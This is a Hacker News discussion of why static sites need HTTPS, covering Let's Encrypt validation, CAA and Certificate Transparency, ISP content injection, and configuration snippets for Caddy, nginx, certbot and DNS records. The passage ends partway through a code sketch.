Why Static Websites Need HTTPS (troyhunt.com)
328 points by edward on Aug 28, 2018 | 253 comments



Let's Encrypt is one of the best things that happened to the web recently. I wish we had more choices though. Relying so much on a single party is unnerving.


It is good, but it's annoying that it arrived before we were able to properly lock domains down to certificate authorities via DNS. It used to be that a bad actor who owned part of your backend, but couldn't get your private keys, at least had to buy a new cert.

Now they can just use Let's Encrypt.


IIRC Let's Encrypt is more strict in its validation (HTTP, DNS and TLS-SNI) than the least onerous authorities before it. The difference is that it is automated and free, but I don't think I can get any cert I couldn't get before (either for payment or free).


No, that's not correct, and I've been downvoted by people who don't know the history of DNS Certification Authority Authorization (CAA), which only became mandatory in 2017.

Let's Encrypt launched in 2016, which meant that unless you were doing HPKP with long pin times and had traffic that had already hit your endpoint, someone who was on your gear (but lacked your private key) could impersonate you for free, with no messing around with stolen credit cards at CAs.

To validate with Let's Encrypt, contrary to what you recall, all you are required to prove is that you can serve a specific value at a specific path on the domain you are responsible for.

DNS verification is an option, but few use it.
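For the curious, the HTTP challenge ("http-01" in RFC 8555) boils down to serving a token-derived string at a well-known path. A minimal Python sketch of the strings involved; the thumbprint helper assumes the caller passes the canonical RFC 7638 JWK JSON:

```python
import base64
import hashlib

def challenge_path(token: str) -> str:
    # The CA fetches http://<domain>/.well-known/acme-challenge/<token>
    return f"/.well-known/acme-challenge/{token}"

def jwk_thumbprint_b64url(canonical_jwk_json: str) -> str:
    # RFC 7638: unpadded base64url of SHA-256 over the canonical JWK JSON
    digest = hashlib.sha256(canonical_jwk_json.encode()).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()

def key_authorization(token: str, thumbprint: str) -> str:
    # The body served at the challenge path is "<token>.<thumbprint>",
    # binding the challenge to the requesting ACME account key
    return f"{token}.{thumbprint}"
```

Proving you can serve that string at that path is the whole check; nothing about it identifies the legal entity behind the domain.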

Let's Encrypt has meaningfully lowered the barrier to certificate forgery. Every startup should set CAA records now, but few do. It's still good that Let's Encrypt exists, but it has its drawbacks.
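For anyone wanting to do this: CAA is a plain DNS record type. A sketch of zone entries restricting issuance to Let's Encrypt (the domain and contact address are placeholders):

```
; Only Let's Encrypt may issue certificates for this domain
example.com.  IN  CAA  0 issue "letsencrypt.org"
; Disallow wildcard issuance entirely
example.com.  IN  CAA  0 issuewild ";"
; Optional: where CAs should report policy violations
example.com.  IN  CAA  0 iodef "mailto:security@example.com"
```

Since CAA checking became mandatory in 2017, a compliant CA must refuse to issue for the domain unless it matches an `issue`/`issuewild` entry.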


This is really a drawback of the browser though, right? Let's Encrypt is about making traffic https not giving you strong verification of the other party. It's right there in the name!

The browsers do show different indicators for better-verified certificates, e.g. "YOUR BANK LTD." on a bank's EV cert versus just "Secure" on Hacker News or my page secured with Let's Encrypt.

So controlling traffic on the domain is really sufficient for the promise that LE is trying to make to you which is "When I accessed this domain, the entity that owns this key controlled the traffic. I don't really know anything about the entity."

If you think that presents a vulnerability then it's because you're equating HTTPS with entity verification (and I don't blame you, because the browsers have trained us to do this).


Unfortunately the "YOUR BANK LTD" certs have a major drawback: No obscure / arbitrary subdomains. It's why Google doesn't use them.

And I agree with your conclusion that HTTPS is better than HTTP, but it doesn't mean we're talking to whom we think.


> Unfortunately the "YOUR BANK LTD" certs have a major drawback: No obscure / arbitrary subdomains.

Why is that a drawback from a user's POV? I wish sites would try hard to keep their stuff in one part of the DNS name tree, if only to make uMatrix easier to use. I'm glad of anything that encourages them to do so.


Is your argument honestly that paying less than $10 is a sufficient deterrent for a serious attacker? To take advantage of a mis-issued certificate to begin with requires more resources than that.

It's disingenuous to call this certificate forgery. If your gear is owned or somebody is in a position to perform active MITM on you, then WebPKI doesn't give a damn about your situation to begin with. It's not part of the security model they're concerned with. DV does exactly what it says on the label, and Let's Encrypt did nothing to change that.


The reality is that it isn't the $10, or the $120 for a wildcard; it's the credit card that matters. When Let's Encrypt works in a scriptable context, something that used to be manual and a judgement call becomes routine.

I know this seems like splitting hairs, but it's actually mattered to some of my clients. Try to reverse the chessboard. This is exactly how things slip in and this is really being used in the wild.


Forgive me for further splitting hairs, but you can buy SSL certificates without a credit card or proof of identity (Namecheap + Bitcoin since 2013 being one but not the only opportunity).

I think this $ thing is an arbitrary line in the sand based on an imperfect picture of how things used to be, and how things used to be did not protect domain owners. Getting certificates mis-issued used to be waaaay easier than it is now (even without demonstrable control of the domain/website). There were a tonne of insecure methods provided for in the BRs and there was no visibility into it until CT came along.


I don't think this changed what you think it changed.

Historically a Certificate Authority did whatever it pleased to validate control over the name. It is _definitely_ true that an adversary who "was on your gear" could get a certificate.

Once the CA/B Forum comes into existence (which is when those green bar "EV" certificates appear) there are rules for how to do this validation, but, crucially, those rules have a clause which says "Any other method". Yup, CAs were still free to do whatever they wanted.

By 2010 or so they could get a "free trial" certificate, which would be annoying for a real site owner but crooks don't care about that, the "free trial" period is long enough to get the job done, and if the site's actual owners get billed for exceeding their "free trial" well boo hoo.

In 2016 the CA/B voted on new rules for validation which got rid of "Any other method" but although the vote passed, it was tied up in lawyer hell because it turns out commercial CAs owned patents on lots of crappy methods.

In summer 2017 Mozilla got tired of the foot-dragging caused by lawyers and simply changed _their_ trust rules, which in effect unilaterally changes the rules for a public CA since "Our certificates don't work in Firefox" might as well say "We don't want to be in business any more, bye".

These new rules are the Ten Blessed Methods (but now only eight or nine are in use) but crucially Let's Encrypt, unlike a lot of commercial CAs, had been compliant from its creation, indeed its staff helped write them.

Your rosy view is totally wrong, here are two REAL examples of things actual publicly trusted CAs were doing prior to the Ten Blessed Methods which weren't even _prohibited_ even though they're worthless:

1. Send an email to administrator@example.com with a link in it. If the link is resolved, this validates that the legitimate owner of example.com wanted a certificate issued for any name under example.com

What if an "anti-virus" gateway dereferences the link to check if it's a viral payload before trying to even deliver the email?

"Hi, An Actual Criminal wants a certificate issued for login.yourbank.example. As the Administrator please click this link to authorise this certificate."

[ AV software dereferences link. Cert issued to An Actual Criminal. The system works... ]

"I'm sorry, administrator@yourbank.example doesn't exist"

[ Oh right, nobody at yourbank.example actually even saw the verification message. Well I'm sure it's fine ]

2. Tell the applicant to specify a URL where they can see a special one-time code, once the applicant confirms that's done check the one-time code is seen at that URL

What if the attacker suggests a URL that is just the one-time code, URL escaped, and the result is a 404 error reciting the code because that's just how your server's 404 errors work?

Nobody would accept a 404 error as proof? Right? Wrong. Well, OK, but once they fixed that it's fine, right? Wrong, lots of commercial HTTP servers don't send 404, they send a redirect and paste your message into the redirect, thus passing the test.

Let's Encrypt's design actually does a pretty good job here, if you feel this isn't enough then the reality is that before the Ten Blessed Methods many other trusted CAs were _worse_


Can you clarify what restrictions you'd like to see in place? I didn't quite follow this, but if you can describe what you want to see, I might be able to describe a way to do it or request that it be created.


It's fine now, since following CAA records is mandatory, but prior to 2017 CAs didn't, and even now most websites don't publish them. CAA should be mandatory in a Let's Encrypted world, because it's now trivial to create an HTTPS cert; it no longer requires stolen credit card details.


Thanks. I'm also hoping that some day there will be a direct domain-registrar-to-CA authentication protocol of some sort!


More from the authoritative DNS servers than the registrar, but with DNSSEC enabled, DANE[0] is a pretty good system.

Google deemed the failure rate of ~2% too high, but I hold out hope that banks and other high-value targets will use DANE in tandem with the traditional HTTPS CAs, with something like HSTS except that instead of requiring HTTPS for a particular domain, it would require DANE. Maybe viewing your account would accept a CA-signed cert, but an actual money transfer would go through a subdomain that requires DANE.

[0] https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Na...
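For reference, a DANE association is published as a TLSA record in the DNSSEC-signed zone. A sketch pinning the server's own certificate (the hash below is hypothetical):

```
; Usage 3 (DANE-EE): trust this end-entity key directly,
; selector 1: match the public key, matching type 1: SHA-256
_443._tcp.www.example.com. IN TLSA 3 1 1 (
    8755cdaa8fe24ef16cc0f2c918063185e433faaf1415664911d9e30a924138c4 )
```

A DANE-aware client would then refuse any certificate whose key doesn't match, regardless of which CA signed it.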


Sure, I was thinking about authentication for certificate issuance purposes (where Let's Encrypt already enforces DNSSEC validation for all issuance-related DNS lookups where DNSSEC is present on a zone—in fact, invalid DNSSEC signatures aren't an uncommon reason for issuance problems).

But DANE enforced by clients would also be quite valuable for preventing problems due to CA misissuance, or for the problem recently highlighted by security researchers that someone might deliberately allow a domain to expire while still possessing long-lived certificates for names under that domain.


StartSSL already existed.


Do we have conclusive evidence yet that LE is not a honey pot? I mean, if I were the NSA...


It's a valid question, with two possible threat models:

1) the honeypot uses your private keys to MITM connections

Let's Encrypt doesn't handle your private keys. You generate them yourself, and submit a CSR (certificate signing request) to LE to get a cert issued. They have no knowledge of your private key.

2) the honeypot issues fake certs

Let's Encrypt submits every cert it issues to public logs; see https://crt.sh/ . To verify, it'd be pretty trivial to create a browser extension (if one doesn't exist already) that checks whether the certs you encounter appear in the certificate log.
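A sketch of what such a check could build on: crt.sh does expose JSON output for a domain query. The parsing below runs against an inline, made-up sample rather than the live service:

```python
import json
from urllib.parse import quote

def crtsh_query_url(domain: str) -> str:
    # crt.sh's real JSON endpoint for listing logged certs for a name
    return f"https://crt.sh/?q={quote(domain)}&output=json"

def issuers_seen(crtsh_json: str) -> set:
    # Reduce the log entries to the set of CAs that issued for the name
    return {entry["issuer_name"] for entry in json.loads(crtsh_json)}

# Inline sample shaped like crt.sh output; the data itself is made up
sample = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3",
     "common_name": "example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3",
     "common_name": "www.example.com"},
])
```

An unexpected issuer in that set for your own domain is exactly the misissuance signal CT is designed to surface.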


For CT the finished system involves browsers checking that the server can prove its certificates were logged (the ones you get from Let's Encrypt have such proof embedded) and periodically talking to Log Monitors (e.g. owned by your browser vendor) about proofs it has seen.

If somebody has seen a proof that is contradicted by the published log state, the Logs involved are corrupt. If an otherwise-authentic cert is shown without proofs, or those proofs are bogus, the cert may have been left unlogged for nefarious reasons; it shouldn't be accepted and needs reporting.

Chrome has the start of this, it checks for the proofs. Firefox is getting roughly the same feature "soon". But the finished system with all bells and whistles is probably a year or five away.

Good news is that even unfinished CT has been very effective.


What would you do with this power? Let's Encrypt certificates are public and don't involve any knowledge of subscribers' private keys.


You don't need to have private keys to exploit this scenario. Let's say you own example.com, and you add a certificate by Let's Encrypt. If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

The value of a CA is that it's a trusted third party that holds a private key used to sign public keys (certificates). A CA should never get hold of your private keys.


> If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

I'm not sure if you're referring to CAs' ability to issue fake certificates, or if you're suggesting that the certificate issuer can directly MITM connections.

CAs' ability to issue fake certificates is a very serious concern, which has led to the Certificate Transparency system where all issued certificates must be publicly disclosed (in a system outside the issuer's control) in order to be publicly trusted. A site doesn't have to use a certificate from a particular CA in order to be vulnerable to misissuance by that CA, as in the Iranian Comodo and DigiNotar attacks, where Gmail was briefly vulnerable to MITM attacks involving misissued certificates from these CAs even though it didn't normally use certificates from either of them at all.

CAs don't have the ability to use their signing keys directly to MITM connections involving certificates that they issued, because the signing key isn't used for any cryptographic purpose other than validating that the certificate (which refers to the site's public key) was validly issued.


Of course, you're right. My phrasing was not the best. The rogue CA would need to perform a classical MiTM as all the other mortals do, having access to the signing keys does not give you special MiTM powers, other than when you actually are able to conduct a MiTM through other means, you'll have valid certs to intercept the connection.

Totally agree with your point about trust being a very hard problem to solve; that's why CAs first came into place, and now we have CT (which is not widely adopted yet). It is a problem with no clear and definite solution yet.

Edit: Also, CT is no magical solution. It's just another "node" in the graph of trust we're establishing. As many other things have in the past, the CT system itself could also fail.


Chrome requires certs to be published in CT in order to trust them[0], since Chrome 68[1]. Because of this, I would say CT is widely adopted.

[0]: http://www.certificate-transparency.org/certificate-transpar... , Certificate Inclusion Check

[1]: https://groups.google.com/a/chromium.org/forum/#!msg/ct-poli...


> The rogue CA would need to perform a classical MiTM as all the other mortals do, having access to the signing keys does not give you special MiTM powers, other than when you actually are able to conduct a MiTM through other means, you'll have valid certs to intercept the connection.

But this thread is operating under the thought experiment that the NSA already owns LetsEncrypt. And in reality-- at least according to the Snowden leaks-- NSA currently has classical MiTM capabilities. (Can't remember which program it was that was using some node between the user and the desired server to send back a forged response that would almost always beat the server to the punch.)

So in this thought experiment there are only two pieces of Triforce and NSA has them both.


> (Can't remember which program it was that was using some node between the user and the desired server to send back a forged response that would almost always beat the server to the punch.)

These were called QUANTUM (with various sub-projects related to specific applications of that capability).


The point is that the NSA doesn't need to own Let's Encrypt to do that; they could use literally _any_ certificate authority.

Also, there _is_ a third piece of the Triforce: certificate transparency logs, and those would be very difficult to compromise without the certificate transparency monitors noticing.


> If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

Only if they were also able to suppress certificate transparency logging, or target only users without it (or with a hacked browser, or whatever), to keep site owners from finding out about invalid certs being issued.


If it's an NSA honeypot it will still be a positive thing for 99% of use cases.

Also, why would they do this? It's smarter to compromise the existing CAs.


What use would it be? You don't send LE the private key, and if the NSA was just going to forge TLS certs, they wouldn't need LE to do it.


Any CA could be a honeypot. I would say LE is less likely because so much of what they do is in the open.


The HTTPS security model is fundamentally broken to meet the needs of the junta. National Security Letters can be used to "legally" obtain the root certificate keys of all root CAs even remotely affiliated with the United States. You must be extremely naive to believe that the NSA has not already collected all root CA keys relevant to operations within US borders. NSLs also tend to forbid disclosure of their own existence, so you will never know that the root CA is compromised. If you as a root CA disclose the existence of such an NSL, MS-13 might pay you a visit, and you might unfortunately show up in an obituary in a newspaper nobody reads.


If this were something the NSA were actually doing, wouldn't we have noticed it by now via the rogue certificates showing up in certificate transparency logs?


When I read things like that, I always think of the paper "The Rational Rejection of Security Advice by Users". [1]

Yes, content injection is bad, but the chance of it happening multiplied by the damage it could cause to your users is probably less than the effort required to shift a static blog to HTTPS. (Do not underestimate the leap in difficulty from copy-pasting from an Nginx tutorial to understanding how Let's Encrypt works.)

[1] https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.p...


As a website visitor, if I don't see HTTPS, I worry -- ever so slightly -- that someone has added some junk to the content along the way, whether it's my ISP or someone with a fake AP in a coffee shop.

I also just don't want ISPs etc. knowing what content I read, in minute detail. No, I don't "have something to hide", but I'm sick of it being so easy for companies to build detailed profiles of my habits and then sell that information to people who want to sell me things. No thanks.

Sure, I could run a VPN all the time. But I think to be a good web citizen, site operators should do all they can to protect their users from malicious actors out there. TLS is just one piece of that.

And honestly, for a modest static blog site, you can set up Let's Encrypt in less than an hour.


The worry is well-founded too, as e.g. tons of hotels I've visited have added junk, even recently, as have some coffee shops (mostly prior to widespread wifi-ification though, I haven't seen it in a while). Airplane / airport wifi has as well.

HTTP feeds this kind of hostile behavior.


No need to worry. That static site is probably loading dozens of javascript libraries and mining every click on the page anyway... err, analytics.


https://www.usenix.org/system/files/conference/usenixsecurit...

A big part of the problem here is that vendors do a _lousy_ job of making this easy. An out-of-box Apache is a fairly good HTTP server, but it'll take you an hour with a good tutorial to make it a half-way decent HTTPS server. Not because HTTPS is inherently difficult but because no relevant expertise was brought to bear in Apache's implementation.

And this isn't just a Unix flavour problem, the IIS handling of TLS is garbage too. Microsoft has documentation that's incomplete or flat wrong, and then you're expected to muddle along following blog posts and video tutorials.

There's a LOT of cargo culting in this space. Almost every instance of the name "Middlesex" you see in an X.509 certificate is a result of this sort of cargo culting, because the postal county of Middlesex ceased to exist before X.509 was even created, but it looks superficially as though you need to specify a "county" in X.509 and so people based in London dredged up Middlesex. And it didn't _break_ anything so they kept doing it without knowing why.


FWIW, Apache is getting native support for ACME certs: https://letsencrypt.org/2017/10/17/acme-support-in-apache-ht...

Hopefully in the future more web servers will implement this, and HTTPS will be enabled as the default configuration.


That was one of my favorite Mozilla Open Source Support projects!


My house is insecure. There's no alarm, so anyone could just smash a window and steal my TV. But replacing my TV costs a lot less than an alarm system, and a thief's risk of being caught outweighs the TV's value.

My landlord sent a handyman in while I was on vacation once, and the handyman didn't close the front door all the way (or try to lock it). My door was open for 3 days, visible from the street, and I don't live in the nice side of town. No one stole the TV, but my electric bill was high that month.

A MITM attack on a static site is definitely possible, maybe even easy, but I'm not going to worry about it unless I have something important to protect.


> A MITM attack on a static site is definitely possible, maybe even easy, but I'm not going to worry about it unless I have something important to protect.

HTTPS doesn't protect the content of your site from being stolen, it protects your users from hostile third-party content masquerading as yours.


>it protects your users from hostile third-party content masquerading as yours

Exactly. What does anyone lose if my anonymous untrusted blog does something untrustworthy for that one reader who has an infected router?

Should I encrypt messages I write on post cards, because I'm afraid a disgruntled postal worker will write "you suck" on the bottom? The worst case scenario here is temporary vandalism.


The same argument applies to littering. It's only going to harm strangers, and you're unlikely to get caught, so strictly from a cost-benefit perspective it seems like a good idea. But if everyone makes that "rational" decision then we all lose.


The problem is that as a community we want to move to where no traffic is unencrypted so the MITM don't have to be trusted. If your static site wants an exception then your static site is going to be where I get hit.


No, the worst case scenario is that the user gets compromised/infected and becomes part of a botnet that attacks the rest of us.


> HTTPS doesn't protect the content of your site from being stolen, it protects your users from hostile third-party content masquerading as yours.

Hostile third party content is only hostile because the client used to access the content does not take client security seriously.

Food for thought: As an end user consumer visiting random, benign websites, I want my browser to be protecting me against hostiles, rather than relying on website operators to do that for me. Just like I run antivirus on my machines instead of relying on everyone else to run it.


Just make it so that your browser doesn't render any http delivered content. Problem solved. From a client point of view that's the only protection you can do. A MITM over http is undetectable for you. With current OSes and hardware there is no sandboxing which will protect you under all circumstances.

If you do this, site providers are forced to switch to https anyway.


> If you do this, site providers are forced to switch to https anyway.

No, if everyone does this, providers are forced to switch. If you do it, it just means you're cut off from some portion of the web.


I guess one problem with risks on the web when compared to your house analogy is that automation can make all the difference there. For the specific MITM example automation might be less likely, but on computer networks, even very unlikely risks can get amplified by the fact that someone can just automate the exploitation.

If automated drones roamed the country looking for open doors to break into, people might be more worried about their home security. Fortunately, the physical world protects us from wide-scale exploitation.


High bill because someone walked in and watched TV for three days? (I'm guessing it was actually due to heating/aircon)


You know what's even easier than a simple Nginx server setup? A simple https://caddyserver.com server setup, which will automatically provision a Let's Encrypt cert for you, no configuration required.
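For illustration, a minimal Caddyfile (Caddy v1 syntax, current as of this thread; the domain and path are placeholders). Caddy obtains and renews the Let's Encrypt certificate on its own:

```
# Serving this site name over HTTPS is automatic;
# Caddy handles the ACME challenge and renewal itself
example.com {
    root /var/www/blog
    gzip
}
```

The entire TLS story is the absence of any TLS configuration.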

Or, let's go even simpler: no server of your own at all. Anyone who uses GitHub Pages for their static site, gets an automatic LetsEncrypt cert provisioned for their custom domain if they set one. (I'm honestly surprised that other SaaS hosts that set you up with some service on a subdomain, and allow you to map it to a custom domain, haven't followed along and done the same. It's an easy feature to offer!)

Deploying Nginx is a uniquely-bad example to use right now for TLS ease-of-use. There are all sorts of setups where TLS "just happens"—some of which web-development novices will likely encounter before they become experienced enough to consider "deploying their own web server" to be a sensible action.


Thank you for sharing Caddy -- haven't heard of this until your comment. Cheers!


This is important, because the discussion around HTTPS tends to train users into thinking that HTTPS = web security.

I totally agree that it's important, and I understand the attack vectors. But what about your outdated WordPress/Joomla installation? What about your default password on your admin site? Those I think are more serious issues, but of course harder to tackle.

To exploit a MiTM you need to be on the same network; this could be achieved through your local cafe's WiFi or by compromising an internal system on a local network. Not a trivial task, I would say. If you manage to pull it off, the impact is contained to that local network.

If you compromise the insecure site directly, you reach a much wider audience, and HTTPS won't help in this scenario.


> To exploit a MiTM you need to be on the same network, this could be achieved through your local-cafe's WiFi or by compromising an internal system of a local network.

Or, say, your ISP injecting ads and tracking scripts into unencrypted pages your browser requests.


Holy, I forgot about that one! You're totally right and I'm surprised it's not one of the main arguments for this push for HTTPS.


IMO it's really the only compelling argument for HTTPS on sites that don't deal with traffic worth intercepting. Other than that, I agree with you re café Wi-fi, etc: the man-in-the-middle risk is so small and localized that it may as well not exist.


Not only is the coffee shop using an ISP that is likely MITMing you, insecure coffee wifi routers can be exploited at scale to MITM a lot of coffee shops at once.


I think that's why Google has been pushing so hard for HTTPS; ISPs were able to do tracking just as well under HTTP, so Google wants to shut that door.


The other side I would pose is: do you want anyone to be able to alter your responses? I'm currently trying to find the RFC, but I recall an RFC an ISP defined for tampering with HTTP responses in transit. In addition, I also recall seeing Comcast (I believe) injecting JS to tell users they are approaching their plan limits.

Obviously, not the end of the world. But do you want any third party to easily alter the response from your server to the client(s)?


I believe you're thinking of RFC 6108: https://tools.ietf.org/html/rfc6108

Related HN discussion: https://news.ycombinator.com/item?id=15890551


> In addition, I also recall seeing Comcast (I believe) injecting JS to users that they are approaching their plan limits

This has happened to me. Re-installed Windows on my gaming computer and re-downloaded all my games. By the time I hit 900GB usage, any HTTP page would display a popup with "You have 100GB of data left".

I thought it was malware on the website trying to phish me the first time I saw it.


Exactly this. If you can't imagine the harm in that - pretend they are injecting NAMBLA ads or Goatse-type images into your blog.


I've also seen airlines do this with their in-flight wifi. Looking at you, Icelandair.


It's not just about the chance of problems, it's also the fact that browsers are making it very obvious when a site doesn't have https, and this is enough to scare users away.


You don't need to "understand how Let's Encrypt works" to use it. You can still copy & paste from a tutorial in order to set it up.


cPanel comes with an easy-to-use Let's Encrypt module. It auto-renews the certificate and sends optional email alerts each time it renews or fails.

Web hosts are making it easy to use Let's Encrypt, which surprised me. I thought they'd be reluctant to give up the revenue from high-margin certificate sales.


This varies a lot from web host to web host.


Not GoDaddy


I've had a quick look at the paper you reference, but my immediate question is ... this was written around 2009. If the costs and likelihood of getting hacked or phished have increased significantly, some of the conclusions of the paper may now be misleading, at least in detail. Has anyone done an update in the last year?

I still like the paper for one good reason ... it challenges IT people to ask the question: what risk am I mitigating with this rule on the users, and is it worth everyone's effort that will go into it? If yes, see if you can impose the rule. If no ... just be sure you didn't get the numbers wrong.


wait, what? if you can get nginx running you can get lets encrypt running


Pretty sure you can use certbot and just run like... a few commands. Even easier than setting up Nginx.


Certbot has an issue with dependencies that I'd rather not deal with on a production server:

https://github.com/certbot/certbot/issues/1301

Not to worry though, there are over 100 other ACME clients that I can choose from.


It's true that certbot is very easy to install and run on stable machines with full command-line access. And a lot of PaaS providers pre-package a Let's Encrypt feature to allow simple setup of an SSL cert (as simple as ticking a checkbox most of the time).

Now certbot in itself is not really simple, in my opinion, and you feel it very fast as soon as you fall off the beaten path. For instance, having it run on volatile instances isn't simple; or if the PaaS misses the single feature you need (e.g. wildcard support on Heroku), you'll have to bear all the complexity on your own shoulders again.

In particular, the base principle is to renew the cert every 60 days (certs are only valid for 90), so proper automation and error handling are inherently the first barrier to entry for certbot. That's already a bit further than "a few commands", in my opinion.
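On the standard single-server path, though, that automation can be a one-line crontab entry; `certbot renew` is a no-op unless a cert is near expiry, and the reload hook shown assumes nginx is managed by systemd:

```
# Attempt renewal daily at 03:00; certbot only acts on certs
# that are within 30 days of expiry, then reloads nginx
0 3 * * * certbot renew --quiet --post-hook "systemctl reload nginx"
```

The pain the parent describes starts when there is no stable machine for this cron job to live on.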


The point isn't that it is particularly difficult (if you know what you are doing). The point is that from a cost-benefit perspective, it probably isn't worth more than 2 minutes of your time, if that.


Given that Chrome now throws a "not secure" message against your URL when it's HTTP, it's more than worth two minutes, IMO.


There's always something like CloudFlare. You have to use them as your main NS, but both transferring the domain and enabling HTTPS is a few clicks (properly configuring your server to only be accessible via CF might be harder, but may not be needed in the static-site case).


Two stories.

Firstly, I had a fair number of websites with a now EIG-owned company for about 10 years. It was just a shared host, but they're all low traffic, and I could easily add a domain name and spin up a blog/project. A few years back I needed HTTPS for an API I was working with; the cost was something like $40 a year per domain, for a project that wasn't a money spinner. So I found another (read: free) way to access the API.

Earlier this year I asked again. It was something like $20-$100 per domain to put an HTTPS cert in place, even if I got it myself from LetsEncrypt. As the entire package was about $100 a year (up 30%, with worse customer service since EIG took over), I finally took the step and moved all my sites elsewhere. The new host isn't much more expensive, but provides free LetsEncrypt certs with a click from the control panel. I now use HTTPS on most things.

Secondly, I have a few sites with a decent number of FB likes that have counted up as the result of some viral/social campaigns in the past. None have forms on, all are links to elsewhere. Currently those likes work as (not insignificant) social proofing. Move the site from http to https and I lose the count on the Like button.

The cost in the first point (or the effort/time/cost in moving everything) just hadn't been worth it for the smaller stuff. Facebook not sorting the counts hasn't made it worth it in the second. I suspect my reasons are 2 of many that stop people from upgrading - I guess I'm just saying that even with the best intentions, there are other factors at play that prevent John Everyman from making the move. Make it easy/default for him, more https everywhere.


You can set up your apache/nginx or whatever webserver to redirect http requests to https. That way you can still link to your website with an http:// URL.
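A minimal sketch of that redirect in nginx (the server name is a placeholder):

```nginx
server {
    listen 80;
    listen [::]:80;
    server_name example.com;
    # Permanent redirect so existing http:// links keep working
    return 301 https://$host$request_uri;
}
```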


Appreciated, but this is a hacky solution. If you use the graph explorer, both the http and https addresses have different counts. It's very frustrating - shouldn't be that way.


Add your site to the HSTS Preload List, then it'll be very unlikely to have any HTTP hits.
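For reference, preloading requires first serving a header like this over HTTPS, then submitting the domain at hstspreload.org (nginx syntax shown as an example):

```nginx
# A long max-age, includeSubDomains, and the preload token are all
# required for acceptance onto the preload list.
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
```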


Didn't realise that existed. Very useful thanks!

But again, it's not exactly up there for John Everyman - and it doesn't sort Facebook having different share counts for the https and http domain.


True. And you have to be extra careful with HSTS Preloading; if one of your subdomains breaks because of HTTPS, it'll be a pain to get your domain taken off the list.


> Currently those likes work as (not insignificant) social proofing. Move the site from http to https and I lose the count on the Like button

Surely there must be an alternative way of doing this?


And one reason it doesn't: https://meyerweb.com/eric/thoughts/2018/08/07/securing-sites...

Secure websites make the web less accessible for those who rely on metered satellite internet (and I'm sure plenty of other cases).

Know who your demographic is and make sure you don't make things more difficult for them. Maybe provide an option for users to access your static site on a separate insecure domain, clearly labeled as such.


Nope.

That's fixable in the client using an HTTP proxy.

The whole point of https is to roll back the ability for middleware devices to modify traffic without the authority of the client or the server.

This is a good thing. He shouldn't be setting up a situation where he is intercepting traffic that neither party of the connection had authorized him to intercept. Regardless of how righteous his intentions are.


> Secure makes less accessible for those with shitty connections

This demographic seems especially vulnerable to untrusted 3rd-party networks that promise speed or unlimited traffic. People able to make an actually informed decision about security trade-offs are probably a more difficult audience to reach, and could probably work around the negative trade-offs by themselves, as mentioned by others. So unless you target them especially, you should probably go with the safer default.


There's nothing wrong with making something "more difficult" if it serves the greater good or has a larger positive impact than negative. For one, using a trivially higher percentage of a metered satellite feed is not "more difficult," just perhaps marginally more expensive. What percentage of folks reading static blogs are on a metered satellite connection?

I think if every site and application that is currently HTTP was HTTPS a year from now it would be a net positive for internet users.


Having very high packet loss means something is badly wrong. A good wire-level (yes I know, there are no wires, nevertheless) protocol aims to hit lower packet loss rates by fiddling with other parameters. Example: Let's say you have 40MHz of assigned frequencies, but when both ends measure they find 4MHz of that is full of noisy crap, the rest is fairly quiet. Well, rather than lose bits in those 4MHz and toss away many packets, why not keep 36MHz with a much lower error? If only 6000 packets per second get through of 10 000 sent, then an option to send 9000 and receive 8000 of them is already a win.

Now, upgrading satellites is trickier and more expensive than upgrading your home cable box, at the extreme obviously sending a bloke up to "swap out this board for a newer one" is either tremendously difficult or outright impossible depending on the orbital characteristics. But we shouldn't act as though high packet loss rates at the IP layer are to be expected, they are avoidable. And fixing them will do a lot more than just enable HTTPS to work better.


>But we shouldn't act as though high packet loss rates at the IP layer are to be expected, they are avoidable. And fixing them will do a lot more than just enable HTTPS to work better.

At that distance the physical latency floor alone is almost a second for a round trip. You literally cannot go below it. The high latency will make a lot of protocols simply time out or consider the packet lost.

At that distance you need some well-engineered ground equipment to handle the signal losses: a dish and a high-powered transmitter that need to be within a degree of the target. If you're off by a degree you're likely going to hit very bad packet loss. A degree is not much, and it could be caused by the ground below stretching and twisting over the day due to temperature changes. TV doesn't have to deal with sending data up the link, other than through the massively more powerful and expensive dishes of the TV networks themselves.

Lastly, from ground to geostationary orbit you may find that your 40MHz band is full of crap. Not because someone else is sending but because you're sending through a solid belt of radiation and magnetic flux. You'll find that for a wide range of bands they either suck at penetrating the atmosphere, penetrating the magnetic field or get sucked up by interference from half the universe.

The layers above IP have ways to handle packet loss for a reason (although the reason was bad copper cables and bad MAC). Also, the MAC is another problem; you're not the only one who wants to use the very limited resources of the sat. One of the most common and effective forms of bandwidth limiting is dropping packets and it's normal. Packets drop all the time, every TCP connection drops packets. It happens and almost all protocols deal with it on one level or another.


Couldn’t you set up the local cache as a proxy server instead of a MitM to solve this? Though it’s a less transparent solution (you have to set up the proxy and its CA on every client).


That article specifically mentions that service workers avoid these issues. There's nothing stopping static pages from making service workers available.

HTTPS and a service worker are a far better solution than having an insecure domain.


Yeah, that's pretty much not the case once you set up an HTTPS proxy with a cache. HTTPS merely requires this to be opt-in from the client, unlike HTTP where you can just do it, to hell with the client.

Don't spread BS.


If browsers supported a method to provide content securely without the need to encrypt everything, lots of uses of the web would not be hampered by the TLS-everything-that-moves movement. The limitations we have accepted in our browsers are what causes these conflicts. But we don't have to accept them. We could do with less propaganda and more compromise and innovation.


I'm unsure on how you could do what you've said without encryption. Any ideas?


Debian apt repos work this way. Everything has hashes or PGP signatures.

It doesn't have to be encrypted to be trusted. In fact, anyone can set up a separate mirror and clients can use it with no concern about safety.

It doesn't offer confidentiality, but it does offer integrity.
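A minimal sketch of that model (file names and contents here are made up): in apt, the Release/InRelease manifest is PGP-signed and lists digests of every index file, so any untrusted mirror can serve the bytes and the client still detects tampering. Assuming the manifest's signature has already been verified out of band, integrity checking is just comparing digests:

```python
import hashlib

# Hypothetical signed manifest mapping file names to expected SHA-256 digests
MANIFEST = {
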